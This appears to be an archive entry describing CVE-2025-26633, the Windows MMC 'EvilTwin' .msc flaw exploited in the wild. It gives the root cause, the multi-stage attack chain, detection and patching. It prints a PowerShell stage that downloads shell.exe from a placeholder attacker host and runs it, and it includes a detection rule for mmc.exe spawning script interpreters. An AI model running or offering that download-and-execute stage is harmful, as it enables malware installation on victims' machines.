PoC Archive PoC Archive
High CVE-2025-26633 patched

Windows MMC MSC EvilTwin - CVE-2025-26633

by sandsoncosta · 2026-05-17

Severity
High
CVE
CVE-2025-26633
Category
binary
Affected product
Microsoft Management Console (MMC), Windows
Affected versions
Windows versions prior to March 11, 2025 patch
Disclosed
2026-05-17
Patch status
patched

Metadata

FieldValue
Date Added2026-05-17
Last Updated2025-04-08
Author / Researchersandsoncosta
CVE / AdvisoryCVE-2025-26633
Categorybinary
SeverityHigh
CVSS ScoreN/A
StatusPatched
TagsRCE, Windows, MMC, MSC, ActiveX, EvilTwin, APT, EncryptHub, Water-Gamayun, zero-day, in-the-wild
RelatedN/A

Affected Target

FieldValue
Software / SystemMicrosoft Management Console (MMC), Windows
Versions AffectedWindows versions prior to March 11, 2025 patch
Language / PlatformWindows, PowerShell, MSC (XML-based MMC snap-in)
Authentication RequiredNo
Network Access RequiredNo (local file delivery; social engineering required)

Summary

CVE-2025-26633 is a zero-day vulnerability in Microsoft Management Console (MMC) that was exploited in the wild by Russian APT group Water Gamayun (EncryptHub/Larva-208). An attacker crafts a malicious .msc file that abuses the MUIPath resolution mechanism: when MMC loads the snap-in, it resolves a secondary .msc file from an attacker-controlled path and executes embedded HTML/ActiveX content in the MMC context. This enables arbitrary command execution without any user interaction beyond opening the .msc file. The vulnerability was used to deploy the EncryptHub stealer, DarkWisp backdoor, and SilentPrism backdoor, and was patched on March 11, 2025.


Vulnerability Details

Root Cause

The root cause is MMC’s MUIPath resolution logic, which allows a .msc file to reference a secondary .msc file for localized UI resources. When MMC processes this reference, it loads and renders the secondary file’s embedded HTML/ActiveX content without adequate path validation or sandbox restrictions. An attacker can substitute the expected MUI resource file with a crafted .msc containing a malicious HTML/ActiveX payload — the “EvilTwin” technique.

Attack Vector

  1. Attacker crafts a malicious .msc file that specifies a MUIPath entry pointing to an attacker-controlled .msc file (the “evil twin”).
  2. The evil twin .msc contains embedded HTML with ActiveX controls that execute arbitrary commands.
  3. Victim is social-engineered into opening the crafted .msc (e.g., via email, download, or UNC share).
  4. MMC loads the evil twin, the HTML/ActiveX payload runs in the MMC process context, executing arbitrary system commands.

The PoC uses a multi-stage approach:

  • Stage 1 (stage1/dropper.ps1): initial dropper/downloader
  • Stage 2: intermediate payload delivery
  • Stage 3 (stage3/shell.ps1): final payload execution (downloads and runs a C2 executable)

Impact

Arbitrary command execution in the context of the logged-in user via the MMC process. In the wild exploitation led to deployment of the EncryptHub information stealer, DarkWisp backdoor, and SilentPrism backdoor. If the victim has elevated privileges, full system compromise is possible.


Environment / Lab Setup

OS:       Windows 10/11 (unpatched, prior to March 2025 cumulative update)
Target:   Local Windows host with MMC available
Attacker: Host serving malicious .msc and stage payloads (HTTP server)
Tools:    PowerShell, MMC (mmc.exe), HTTP server for payload hosting

Setup Steps


Proof of Concept

Step-by-Step Reproduction

  1. Stage 1 - Dropper — Deploy stage1/dropper.ps1 on attacker-controlled server; it downloads and executes the next stage.

    1
    2
    
    # Hosted at http://<attacker>/stage1/dropper.ps1
    # Called by the malicious .msc ActiveX payload
    
  2. Stage 2 - Payload Delivery — The crafted .msc (evil twin) contains HTML/ActiveX that calls dropper.ps1 via Shell.Application or WScript.Shell.

  3. Stage 3 - Shellstage3/shell.ps1 downloads the final C2 executable to %TEMP%\c2.exe and launches it.

    1
    2
    3
    
    $exePath = "$env:TEMP\c2.exe"
    Invoke-WebRequest -Uri "http://<attacker>/shell.exe" -OutFile $exePath
    Start-Process -FilePath $exePath
    

Exploit Code

See stage1/dropper.ps1 and stage3/shell.ps1 in this folder.

Expected Output

MMC loads malicious .msc, ActiveX executes PowerShell dropper chain,
final payload (c2.exe) runs in victim context.

Screenshots / Evidence


Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert process mmc.exe spawning (powershell.exe OR cmd.exe OR wscript.exe)
  msg: "MMC spawned script interpreter - possible CVE-2025-26633 exploitation"

Remediation

ActionDetail
PatchApply Microsoft March 2025 Patch Tuesday update (KB patching CVE-2025-26633)
WorkaroundBlock execution of .msc files from untrusted locations via AppLocker or WDAC
Config HardeningRestrict MMC snap-in execution via Group Policy; monitor for mmc.exe spawning child processes

References


Notes

Multi-stage PoC repository with separate stage directories. Stage 2 directory was present in the repo but file contents could not be retrieved due to API rate limiting at ingest time; only stage1/dropper.ps1 and stage3/shell.ps1 were saved. The actual malicious .msc file (evil twin) was not present as a standalone file in the repo root — the PoC demonstrates the chain via PowerShell stages. Attributed to Russian APT Water Gamayun (EncryptHub / Larva-208). MITRE ATT&CK coverage in researcher’s blog post.

Auto-ingested from https://github.com/sandsoncosta/CVE-2025-26633 on 2026-05-17.